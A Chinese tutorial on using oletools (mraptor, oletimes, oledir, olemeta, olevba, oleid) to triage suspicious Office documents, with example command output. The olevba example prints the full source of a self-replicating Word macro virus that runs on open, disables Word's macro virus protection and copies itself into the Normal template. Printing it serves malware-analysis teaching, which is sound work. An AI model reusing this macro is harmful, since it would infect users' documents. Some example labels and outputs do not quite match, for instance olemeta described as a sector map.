前言
通过学习oletools-python后,能够对恶意文档样本进行基础的分析工作。
什么是oletools-python
oletools-python工具,用于分析MS OLE2文件(结构化存储,复合文件二进制格式)和MS Office文档,以进行恶意软件分析,取证和调试。
下载安装
- Linux、Mac:sudo -H pip install -U oletools
- Windows:pip install -U oletools
工具模块
分析恶意样本文件的工具
oleid:分析OLE文件以检测通常在恶意文件中发现的特定特征。
olevba:从MS Office文档(OLE和OpenXML)中提取和分析VBA Macro源代码。
MacroRaptor:检测恶意的VBA宏
msodde:检测并从MS Office文档,RTF和CSV中提取DDE / DDEAUTO链接
pyxswf:检测,提取和分析可能嵌入在MS Office文档(例如Word,Excel)和RTF等文件中的Flash对象(SWF),这对于恶意软件分析特别有用。
oleobj:从OLE文件中提取嵌入式对象。
rtfobj:从RTF文件中提取嵌入式对象。
分析OLE文件结构的工具
olebrowse:一个简单的GUI,可浏览OLE文件(例如MS Word,Excel,Powerpoint文档),以查看和提取单个数据流。
olemeta:从OLE文件中提取所有标准属性(元数据)。
oletimes:提取所有流和存储的创建和修改时间戳。
oledir:显示OLE文件的所有目录条目,包括空闲和孤立的条目。
olemap:显示OLE文件中所有扇区的映射。
应用例子
- 判断样本是否包含可疑的宏(宏病毒)
python mraptor.py file.docx
输出内容:
MacroRaptor 0.51 - http://decalage.info/python/oletools
This is work in progress, please report issues at https://github.com/decalage2/oletools/issues
----------+-----+----+--------------------------------------------------------
Result |Flags|Type|File
----------+-----+----+--------------------------------------------------------
Macro OK |--- |TXT |log.docx
Flags: A=AutoExec, W=Write, X=Execute
Exit code: 2 - Macro OK
mraptor通过启发式方法检测大多数恶意VBA宏,不同于杀毒引擎检测特征码。当发现文档自动执行触发器和写入文件系统或内存操作,或执行VBA上下文等操作时会判断为恶意宏。
- 获取样本中所有流和存储的创建和修改时间
python oletimes.py file.doc
输出内容:
FILE: file.doc
+----------------------------+---------------------+---------------+
| Stream/Storage name | Modification Time | Creation Time |
+----------------------------+---------------------+---------------+
| Root | 2017-01-04 02:04:53 | None |
| '\x01CompObj' | None | None |
| '\x05DocumentSummaryInform | None | None |
| ation' | | |
| '\x05SummaryInformation' | None | None |
| '1Table' | None | None |
| 'Data' | None | None |
| 'WordDocument' | None | None |
+----------------------------+---------------------+---------------+
通过oletimes获取文件的时间信息,在处理大量文档样本的过程中能够协助我们梳理文件的创建顺序和关联关系。
- 查看文档中流结构基本信息
python oledir.py file.doc
输出内容:
OLE directory entries in file file.doc:
----+------+-------+----------------------+-----+-----+-----+--------+------
id |Status|Type |Name |Left |Right|Child|1st Sect|Size
----+------+-------+----------------------+-----+-----+-----+--------+------
0 |<Used>|Root |Root Entry |- |- |3 |68 |128
1 |<Used>|Stream |Data |- |- |- |15 |4096
2 |<Used>|Stream |1Table |1 |6 |- |1D |27856
3 |<Used>|Stream |WordDocument |2 |5 |- |0 |10290
4 |<Used>|Stream |\x05SummaryInformation|- |- |- |54 |4096
5 |<Used>|Stream |\x05DocumentSummaryInf|4 |- |- |5C |4096
| | |ormation | | | | |
6 |<Used>|Stream |\x01CompObj |- |- |- |0 |110
7 |unused|Empty | |- |- |- |0 |0
- 查看文档中的OLE所有扇区的映射
python olemeta.py file.doc
输出内容:
FILE: file.doc
Properties from the SummaryInformation stream:
+---------------------+------------------------------+
|Property |Value |
+---------------------+------------------------------+
|codepage |936 |
|title | |
|subject | |
|author |TIPDM |
|keywords | |
|template |Normal.dotm |
|last_saved_by |User |
|revision_number |6 |
|total_edit_time |1740 |
|last_printed |2016-06-27 05:49:00 |
|create_time |2016-07-27 23:49:00 |
|last_saved_time |2017-01-04 02:04:00 |
|num_pages |1 |
|num_words |87 |
|num_chars |498 |
|creating_application |Microsoft Office Word |
|security |0 |
+---------------------+------------------------------+
Properties from the DocumentSummaryInformation stream:
+---------------------+------------------------------+
|Property |Value |
+---------------------+------------------------------+
|codepage_doc |936 |
|lines |4 |
|paragraphs |1 |
|scale_crop |False |
|company | |
|links_dirty |False |
|chars_with_spaces |584 |
|shared_doc |False |
|hlinks_changed |False |
|version |917504 |
+---------------------+------------------------------
- 提取文档的宏代码
python olevba.py file.doc
输出内容:
Flags Filename
----------- -----------------------------------------------------------------
OLE:MAS--B-- file.doc
===============================================================================
FILE: file.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: file.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
'APMP
'KILL
Private Sub Document_Open()
On Error Resume Next
Application.DisplayStatusBar = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then _
Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
With Host
If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, MyCode
If ThisDocument = NormalTemplate Then _
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End With
End Sub
+------------+----------------+-----------------------------------------+
| Type | Keyword | Description |
+------------+----------------+-----------------------------------------+
| AutoExec | Document_Open | Runs when the Word or Publisher |
| | | document is opened |
| Suspicious | KILL | May delete a file |
| Suspicious | VBProject | May attempt to modify the VBA code |
| | | (self-modification) |
| Suspicious | VBComponents | May attempt to modify the VBA code |
| | | (self-modification) |
| Suspicious | CodeModule | May attempt to modify the VBA code |
| | | (self-modification) |
| Suspicious | Base64 Strings | Base64-encoded strings were detected, |
| | | may be used to obfuscate strings |
| | | (option --decode to see all) |
+------------+----------------+-----------------------------------------+
olvba是一个解析OLE和OpenXML文件的工具,可以检测VBA宏是否可疑,检查方式通过提取源代码以及通过反沙盒和反虚拟化技术使用的关键字以及潜在的IOC(IP地址,URL,可执行文件名等)。还可以检测和解码几种常见的混淆方法,包括十六进制,反转字符串,base64,dridex,VBA表达式,并从解码字符串中提取IOC。
- 检测文档的特定特征
python oleid.py file.doc
输出内容:
Filename: file.doc
+-------------------------------+-----------------------+
| Indicator | Value |
+-------------------------------+-----------------------+
| OLE format | True |
| Has SummaryInformation stream | True |
| Application name | Microsoft Office Word |
| Encrypted | False |
| Word Document | True |
| VBA Macros | False |
| Excel Workbook | False |
| PowerPoint Presentation | False |
| Visio Drawing | False |
| ObjectPool | False |
| Flash objects | 0 |
+-------------------------------+-----------------------+
通过oleid检测恶意文档的OLE文件类型(例如MS Word,Excel,PowerPoint等)、VBA宏、嵌入式Flash对象、嵌入式宏对象、MS Office加密。
总结
如果下次遇到可疑的文档样本(比如:匿名邮件中的文档附件、QQ交流群中上传的群文档、网盘分享的资源文档等等),都可以尝试使用上述介绍的方法进行基础的检测分析。